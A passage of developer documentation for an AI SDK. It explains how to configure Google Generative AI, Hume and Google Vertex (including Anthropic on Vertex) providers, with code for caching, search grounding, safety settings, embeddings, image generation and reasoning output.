  prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});

// Check cached token count in usage metadata
console.log('Cached tokens:', response.body.usageMetadata);

Explicit Caching

For guaranteed cost savings, you can still use explicit caching with Gemini 2.5 and 2.0 models:

import { google } from '@ai-sdk/google';
import { GoogleAICacheManager } from '@google/generative-ai/server';
import { generateText } from 'ai';

const cacheManager = new GoogleAICacheManager(
  process.env.GOOGLE_GENERATIVE_AI_API_KEY,
);

// Supported models for explicit caching
type GoogleModelCacheableId =
  | 'models/gemini-2.5-pro'
  | 'models/gemini-2.5-flash'
  | 'models/gemini-2.0-flash'
  | 'models/gemini-1.5-flash-001'
  | 'models/gemini-1.5-pro-001';

const model: GoogleModelCacheableId = 'models/gemini-2.5-pro';

const { name: cachedContent } = await cacheManager.create({
  model,
  contents: [
    {
      role: 'user',
      parts: [{ text: '1000 Lasagna Recipes...' }],
    },
  ],
  ttlSeconds: 60 * 5,
});

const { text: veggieLasagnaRecipe } = await generateText({
  model: google(model, { cachedContent }),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

const { text: meatLasagnaRecipe } = await generateText({
  model: google(model, { cachedContent }),
  prompt: 'Write a meat lasagna recipe for 12 people.',
});

Search Grounding

With search grounding, the model has access to the latest information using Google search. Search grounding can be used to provide answers around current events:

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, providerMetadata } = await generateText({
  model: google('gemini-1.5-pro', {
    useSearchGrounding: true,
  }),
  prompt:
    'List the top 5 San Francisco news from the past week.' +
    'You must include the date of each article.',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

The grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:

webSearchQueries (string[] | null)
- Array of search queries used to retrieve information
- Example: ["What's the weather in Chicago this weekend?"]
searchEntryPoint ({ renderedContent: string } | null)
- Contains the main search result content used as an entry point
- The renderedContent field contains the formatted content
groundingSupports (Array of support objects | null)
- Contains details about how specific response parts are supported by search results
- Each support object includes:
  - segment: Information about the grounded text segment
    - text: The actual text segment
    - startIndex: Starting position in the response
    - endIndex: Ending position in the response
  - groundingChunkIndices: References to supporting search result chunks
  - confidenceScores: Confidence scores (0-1) for each supporting chunk

Example response:

{
  "groundingMetadata": {
    "webSearchQueries": ["What's the weather in Chicago this weekend?"],
    "searchEntryPoint": {
      "renderedContent": "..."
    },
    "groundingSupports": [
      {
        "segment": {
          "startIndex": 0,
          "endIndex": 65,
          "text": "Chicago weather changes rapidly, so layers let you adjust easily."
        },
        "groundingChunkIndices": [0],
        "confidenceScores": [0.99]
      }
    ]
  }
}

Dynamic Retrieval

With dynamic retrieval, you can configure how the model decides when to turn on Grounding with Google Search. This gives you more control over when and how the model grounds its responses.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, providerMetadata } = await generateText({
  model: google('gemini-1.5-flash', {
    useSearchGrounding: true,
    dynamicRetrievalConfig: {
      mode: 'MODE_DYNAMIC',
      dynamicThreshold: 0.8,
    },
  }),
  prompt: 'Who won the latest F1 grand prix?',
});

The dynamicRetrievalConfig describes the options to customize dynamic retrieval:

mode: The mode of the predictor to be used in dynamic retrieval. The following modes are supported:
- MODE_DYNAMIC: Run retrieval only when system decides it is necessary
- MODE_UNSPECIFIED: Always trigger retrieval
dynamicThreshold: The threshold to be used in dynamic retrieval (if not set, a system default value is used).

Sources

When you use Search Grounding, the model will include sources in the response. You can access them using the sources property of the result:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { sources } = await generateText({
  model: google('gemini-2.0-flash-exp', { useSearchGrounding: true }),
  prompt: 'List the top 5 San Francisco news from the past week.',
});

Image Outputs

The model gemini-2.0-flash-exp supports image generation. Images are exposed as files in the response. You need to enable image output in the provider options using the responseModalities option.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.0-flash-exp'),
  providerOptions: {
    google: { responseModalities: ['TEXT', 'IMAGE'] },
  },
  prompt: 'Generate an image of a comic cat',
});

for (const file of result.files) {
  if (file.mimeType.startsWith('image/')) {
    // show the image
  }
}

Safety Ratings

The safety ratings provide insight into the safety of the model's response. See Google AI documentation on safety settings.

Example response excerpt:

{
  "safetyRatings": [
    {
      "category": "HARM_CATEGORY_HATE_SPEECH",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11027937,
      "severity": "HARM_SEVERITY_LOW",
      "severityScore": 0.28487435
    },
    {
      "category": "HARM_CATEGORY_DANGEROUS_CONTENT",
      "probability": "HIGH",
      "blocked": true,
      "probabilityScore": 0.95422274,
      "severity": "HARM_SEVERITY_MEDIUM",
      "severityScore": 0.43398145
    },
    {
      "category": "HARM_CATEGORY_HARASSMENT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11085559,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.19027223
    },
    {
      "category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.22901751,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.09089675
    }
  ]
}

Troubleshooting

Schema Limitations

The Google Generative AI API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:

GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified

By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:

const result = await generateObject({
  model: google('gemini-1.5-pro-latest', {
    structuredOutputs: false,
  }),
  schema: z.object({
    name: z.string(),
    age: z.number(),
    contact: z.union([
      z.object({
        type: z.literal('email'),
        value: z.string(),
      }),
      z.object({
        type: z.literal('phone'),
        value: z.string(),
      }),
    ]),
  }),
  prompt: 'Generate an example person for testing.',
});

The following Zod features are known to not work with Google Generative AI:

z.union
z.record

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`gemini-2.5-pro`
`gemini-2.5-flash`
`gemini-2.5-pro-preview-05-06`
`gemini-2.5-flash-preview-04-17`
`gemini-2.5-pro-exp-03-25`
`gemini-2.0-flash`
`gemini-1.5-pro`
`gemini-1.5-pro-latest`
`gemini-1.5-flash`
`gemini-1.5-flash-latest`
`gemini-1.5-flash-8b`
`gemini-1.5-flash-8b-latest`

Embedding Models

You can create models that call the Google Generative AI embeddings API using the .textEmbeddingModel() factory method.

const model = google.textEmbeddingModel('text-embedding-004');

Google Generative AI embedding models support aditional settings. You can pass them as an options argument:

const model = google.textEmbeddingModel('text-embedding-004', {
  outputDimensionality: 512, // optional, number of dimensions for the embedding
  taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
});

The following optional settings are available for Google Generative AI embedding models:

outputDimensionality: number

Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
taskType: string

Optional. Specifies the task type for generating embeddings. Supported task types include:
- SEMANTIC_SIMILARITY: Optimized for text similarity.
- CLASSIFICATION: Optimized for text classification.
- CLUSTERING: Optimized for clustering texts based on similarity.
- RETRIEVAL_DOCUMENT: Optimized for document retrieval.
- RETRIEVAL_QUERY: Optimized for query-based retrieval.
- QUESTION_ANSWERING: Optimized for answering questions.
- FACT_VERIFICATION: Optimized for verifying factual information.
- CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`text-embedding-004`	768

title: Hume description: Learn how to use the Hume provider for the AI SDK.

Hume Provider

The Hume provider contains language model support for the Hume transcription API.

Setup

The Hume provider is available in the @ai-sdk/hume module. You can install it with

Provider Instance

You can import the default provider instance hume from @ai-sdk/hume:

import { hume } from '@ai-sdk/hume';

If you need a customized setup, you can import createHume from @ai-sdk/hume and create a provider instance with your settings:

import { createHume } from '@ai-sdk/hume';

const hume = createHume({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Hume provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the HUME_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the Hume speech API using the .speech() factory method.

const model = hume.speech();

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';

const result = await generateSpeech({
  model: hume.speech(),
  text: 'Hello, world!',
  voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
  providerOptions: { hume: {} },
});

The following provider options are available:

context object

Either:
- { generationId: string } - A generation ID to use for context.
- { utterances: HumeUtterance[] } - An array of utterance objects for context.

Model Capabilities

Model	Instructions
`default`

title: Google Vertex AI description: Learn how to use the Google Vertex AI provider.

Google Vertex Provider

The Google Vertex provider for the AI SDK contains language model support for the Google Vertex AI APIs. This includes support for Google's Gemini models and Anthropic's Claude partner models.

Setup

The Google Vertex and Google Vertex Anthropic providers are both available in the @ai-sdk/google-vertex module. You can install it with

Google Vertex Provider Usage

The Google Vertex provider instance is used to create model instances that call the Vertex AI API. The models available with this provider include Google's Gemini models. If you're looking to use Anthropic's Claude models, see the Google Vertex Anthropic Provider section below.

Provider Instance

You can import the default provider instance vertex from @ai-sdk/google-vertex:

import { vertex } from '@ai-sdk/google-vertex';

If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex and create a provider instance with your settings:

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

Google Vertex supports two different authentication implementations depending on your runtime environment.

Node.js Runtime

The Node.js runtime is the default runtime supported by the AI SDK. It supports all standard Google Cloud authentication options through the google-auth-library. Typical use involves setting a path to a json credentials file in the GOOGLE_APPLICATION_CREDENTIALS environment variable. The credentials file can be obtained from the Google Cloud Console.

If you want to customize the Google authentication options you can pass them as options to the createVertex function, for example:

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object An AuthClient to use.
- keyFilename string Path to a .json, .pem, or .p12 key file.
- keyFile string Path to a .json, .pem, or .p12 key file.
- credentials object Object containing client_email and private_key properties, or the external account client options.
- clientOptions object Options object passed to the constructor of the client.
- scopes string | string[] Required scopes for the desired API request.
- projectId string Your project ID.
- universeDomain string The default service domain for a given Cloud universe.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
baseURL string

Optional. Base URL for the Google Vertex API calls e.g. to use proxy servers. By default, it is constructed using the location and project: https://${location}-aiplatform.googleapis.com/v1/projects/${project}/locations/${location}/publishers/google

Edge Runtime

Edge runtimes (like Vercel Edge Functions and Cloudflare Workers) are lightweight JavaScript environments that run closer to users at the network edge. They only provide a subset of the standard Node.js APIs. For example, direct file system access is not available, and many Node.js-specific libraries (including the standard Google Auth library) are not compatible.

The Edge runtime version of the Google Vertex provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a json credentials file from the Google Cloud Console.

You can import the default provider instance vertex from @ai-sdk/google-vertex/edge:

import { vertex } from '@ai-sdk/google-vertex/edge';

If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex/edge and create a provider instance with your settings:

import { createVertex } from '@ai-sdk/google-vertex/edge';

const vertex = createVertex({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

For Edge runtime authentication, you'll need to set these environment variables from your Google Default Application Credentials JSON file:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

These values can be obtained from a service account JSON file from the Google Cloud Console.

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleCredentials object

Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Vertex API using the provider instance. The first argument is the model id, e.g. gemini-1.5-pro.

const model = vertex('gemini-1.5-pro');

Google Vertex models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = vertex('gemini-1.5-pro', {
  safetySettings: [
    { category: 'HARM_CATEGORY_UNSPECIFIED', threshold: 'BLOCK_LOW_AND_ABOVE' },
  ],
});

The following optional settings are available for Google Vertex models:

structuredOutputs boolean

Optional. Enable structured output. Default is true.

This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Vertex uses. You can use this to disable structured outputs if you need to.

See Troubleshooting: Schema Limitations for more details.
safetySettings Array<{ category: string; threshold: string }>

Optional. Safety settings for the model.
- category string
  
  The category of the safety setting. Can be one of the following:
  - HARM_CATEGORY_UNSPECIFIED
  - HARM_CATEGORY_HATE_SPEECH
  - HARM_CATEGORY_DANGEROUS_CONTENT
  - HARM_CATEGORY_HARASSMENT
  - HARM_CATEGORY_SEXUALLY_EXPLICIT
  - HARM_CATEGORY_CIVIC_INTEGRITY
- threshold string
  
  The threshold of the safety setting. Can be one of the following:
  - HARM_BLOCK_THRESHOLD_UNSPECIFIED
  - BLOCK_LOW_AND_ABOVE
  - BLOCK_MEDIUM_AND_ABOVE
  - BLOCK_ONLY_HIGH
  - BLOCK_NONE
useSearchGrounding boolean

Optional. When enabled, the model will use Google search to ground the response.
audioTimestamp boolean

Optional. Enables timestamp understanding for audio files. Defaults to false.

This is useful for generating transcripts with accurate timestamps. Consult Google's Documentation for usage details.

You can use Google Vertex language models to generate text with the generateText function:

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertex('gemini-1.5-pro'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Google Vertex language models can also be used in the streamText function (see AI SDK Core).

Reasoning (Thinking Tokens)

Google Vertex AI, through its support for Gemini models, can also emit "thinking" tokens, representing the model's reasoning process. The AI SDK exposes these as reasoning information.

To enable thinking tokens for compatible Gemini models via Vertex, set includeThoughts: true in the thinkingConfig provider option. Since the Vertex provider uses the Google provider's underlying language model, these options are passed through providerOptions.google:

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderOptions } from '@ai-sdk/google'; // Note: importing from @ai-sdk/google
import { generateText, streamText } from 'ai';

// For generateText:
const { text, reasoning, reasoningDetails } = await generateText({
  model: vertex('gemini-2.5-flash-preview-04-17'), // Or other supported model via Vertex
  providerOptions: {
    google: {
      // Options are nested under 'google' for Vertex provider
      thinkingConfig: {
        includeThoughts: true,
        // thinkingBudget: 2048, // Optional
      },
    } satisfies GoogleGenerativeAIProviderOptions,
  },
  prompt: 'Explain quantum computing in simple terms.',
});

console.log('Reasoning:', reasoning);
console.log('Reasoning Details:', reasoningDetails);
console.log('Final Text:', text);

// For streamText:
const result = streamText({
  model: vertex('gemini-2.5-flash-preview-04-17'), // Or other supported model via Vertex
  providerOptions: {
    google: {
      // Options are nested under 'google' for Vertex provider
      thinkingConfig: {
        includeThoughts: true,
        // thinkingBudget: 2048, // Optional
      },
    } satisfies GoogleGenerativeAIProviderOptions,
  },
  prompt: 'Explain quantum computing in simple terms.',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    process.stdout.write(`THOUGHT: ${part.textDelta}\n`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

When includeThoughts is true, parts of the API response marked with thought: true will be processed as reasoning.

In generateText, these contribute to the reasoning (string) and reasoningDetails (array) fields.
In streamText, these are emitted as reasoning stream parts.

File Inputs

The Google Vertex provider supports file inputs, e.g. PDF files.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertex('gemini-1.5-pro'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
});

See File Parts for details on how to use files in prompts.

Search Grounding

With search grounding, the model has access to the latest information using Google search. Search grounding can be used to provide answers around current events:

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, providerMetadata } = await generateText({
  model: vertex('gemini-1.5-pro', {
    useSearchGrounding: true,
  }),
  prompt:
    'List the top 5 San Francisco news from the past week.' +
    'You must include the date of each article.',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

The grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:

webSearchQueries (string[] | null)
- Array of search queries used to retrieve information
- Example: ["What's the weather in Chicago this weekend?"]
searchEntryPoint ({ renderedContent: string } | null)
- Contains the main search result content used as an entry point
- The renderedContent field contains the formatted content
groundingSupports (Array of support objects | null)
- Contains details about how specific response parts are supported by search results
- Each support object includes:
  - segment: Information about the grounded text segment
    - text: The actual text segment
    - startIndex: Starting position in the response
    - endIndex: Ending position in the response
  - groundingChunkIndices: References to supporting search result chunks
  - confidenceScores: Confidence scores (0-1) for each supporting chunk

Example response excerpt:

{
  "groundingMetadata": {
    "retrievalQueries": ["What's the weather in Chicago this weekend?"],
    "searchEntryPoint": {
      "renderedContent": "..."
    },
    "groundingSupports": [
      {
        "segment": {
          "startIndex": 0,
          "endIndex": 65,
          "text": "Chicago weather changes rapidly, so layers let you adjust easily."
        },
        "groundingChunkIndices": [0],
        "confidenceScores": [0.99]
      }
    ]
  }
}

Sources

When you use Search Grounding, the model will include sources in the response. You can access them using the sources property of the result:

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { sources } = await generateText({
  model: vertex('gemini-1.5-pro', { useSearchGrounding: true }),
  prompt: 'List the top 5 San Francisco news from the past week.',
});

Safety Ratings

The safety ratings provide insight into the safety of the model's response. See Google Vertex AI documentation on configuring safety filters.

Example response excerpt:

{
  "safetyRatings": [
    {
      "category": "HARM_CATEGORY_HATE_SPEECH",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11027937,
      "severity": "HARM_SEVERITY_LOW",
      "severityScore": 0.28487435
    },
    {
      "category": "HARM_CATEGORY_DANGEROUS_CONTENT",
      "probability": "HIGH",
      "blocked": true,
      "probabilityScore": 0.95422274,
      "severity": "HARM_SEVERITY_MEDIUM",
      "severityScore": 0.43398145
    },
    {
      "category": "HARM_CATEGORY_HARASSMENT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11085559,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.19027223
    },
    {
      "category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.22901751,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.09089675
    }
  ]
}

For more details, see the Google Vertex AI documentation on grounding with Google Search.

Troubleshooting

Schema Limitations

The Google Vertex API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:

GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified

By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:

const result = await generateObject({
  model: vertex('gemini-1.5-pro', {
    structuredOutputs: false,
  }),
  schema: z.object({
    name: z.string(),
    age: z.number(),
    contact: z.union([
      z.object({
        type: z.literal('email'),
        value: z.string(),
      }),
      z.object({
        type: z.literal('phone'),
        value: z.string(),
      }),
    ]),
  }),
  prompt: 'Generate an example person for testing.',
});

The following Zod features are known to not work with Google Vertex:

z.union
z.record

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`gemini-2.0-flash-001`
`gemini-2.0-flash-exp`
`gemini-1.5-flash`
`gemini-1.5-pro`

Embedding Models

You can create models that call the Google Vertex AI embeddings API using the .textEmbeddingModel() factory method:

const model = vertex.textEmbeddingModel('text-embedding-004');

Google Vertex AI embedding models support additional settings. You can pass them as an options argument:

const model = vertex.textEmbeddingModel('text-embedding-004', {
  outputDimensionality: 512, // optional, number of dimensions for the embedding
});

The following optional settings are available for Google Vertex AI embedding models:

outputDimensionality: number

Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.

Model Capabilities

Model	Max Values Per Call	Parallel Calls
`text-embedding-004`	2048

Image Models

You can create Imagen models that call the Imagen on Vertex AI API using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { vertex } from '@ai-sdk/google-vertex';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('imagen-3.0-generate-002'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Further configuration can be done using Google Vertex provider options. You can validate the provider options using the GoogleVertexImageProviderOptions type.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleVertexImageProviderOptions } from '@ai-sdk/google-vertex';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: vertex.image('imagen-3.0-generate-002'),
  providerOptions: {
    vertex: {
      negativePrompt: 'pixelated, blurry, low-quality',
    } satisfies GoogleVertexImageProviderOptions,
  },
  // ...
});

The following provider options are available:

negativePrompt string A description of what to discourage in the generated images.
personGeneration allow_adult | allow_all | dont_allow Whether to allow person generation. Defaults to allow_adult.
safetySetting block_low_and_above | block_medium_and_above | block_only_high | block_none Whether to block unsafe content. Defaults to block_medium_and_above.
addWatermark boolean Whether to add an invisible watermark to the generated images. Defaults to true.
storageUri string Cloud Storage URI to store the generated images.

Model Capabilities

Model	Aspect Ratios
`imagen-3.0-generate-002`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-3.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9

Google Vertex Anthropic Provider Usage

The Google Vertex Anthropic provider for the AI SDK offers support for Anthropic's Claude models through the Google Vertex AI APIs. This section provides details on how to set up and use the Google Vertex Anthropic provider.

Provider Instance

You can import the default provider instance vertexAnthropic from @ai-sdk/google-vertex/anthropic:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

If you need a customized setup, you can import createVertexAnthropic from @ai-sdk/google-vertex/anthropic and create a provider instance with your settings:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

const vertexAnthropic = createVertexAnthropic({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

Node.js Runtime

For Node.js environments, the Google Vertex Anthropic provider supports all standard Google Cloud authentication options through the google-auth-library. You can customize the authentication options by passing them to the createVertexAnthropic function:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic';

const vertexAnthropic = createVertexAnthropic({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

You can use the following optional settings to customize the Google Vertex Anthropic provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object An AuthClient to use.
- keyFilename string Path to a .json, .pem, or .p12 key file.
- keyFile string Path to a .json, .pem, or .p12 key file.
- credentials object Object containing client_email and private_key properties, or the external account client options.
- clientOptions object Options object passed to the constructor of the client.
- scopes string | string[] Required scopes for the desired API request.
- projectId string Your project ID.
- universeDomain string The default service domain for a given Cloud universe.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Edge Runtime

The Edge runtime version of the Google Vertex Anthropic provider supports Google's Application Default Credentials through environment variables. The values can be obtained from a json credentials file from the Google Cloud Console.

For Edge runtimes, you can import the provider instance from @ai-sdk/google-vertex/anthropic/edge:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';

To customize the setup, use createVertexAnthropic from the same module:

import { createVertexAnthropic } from '@ai-sdk/google-vertex/anthropic/edge';

const vertexAnthropic = createVertexAnthropic({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

For Edge runtime authentication, set these environment variables from your Google Default Application Credentials JSON file:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleCredentials object

Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. claude-3-haiku-20240307. Some models have multi-modal capabilities.

const model = anthropic('claude-3-haiku-20240307');

You can use Anthropic language models to generate text with the generateText function:

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertexAnthropic('claude-3-haiku-20240307'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Anthropic language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

The following optional settings are available for Anthropic models:

sendReasoning boolean

Optional. Include reasoning content in requests sent to the model. Defaults to true.

If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.

Reasoning

Anthropic has reasoning support for the claude-3-7-sonnet@20250219 model.

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const { text, reasoning, reasoningDetails } = await generateText({
  model: vertexAnthropic('claude-3-7-sonnet@20250219'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    },
  },
});

console.log(reasoning); // reasoning text
console.log(reasoningDetails); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Control

import { vertexAnthropic } from '@ai-sdk/google-vertex/anthropic';
import { generateText } from 'ai';

const errorMessage = '... long error message ...';

const result = await generateText({
  model: vertexAnthropic('claude-3-5-sonnet-20240620'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'You are a JavaScript expert.' },
        {
          type: 'text',
          text: `Error message: ${errorMessage}`,
          providerOptions: {
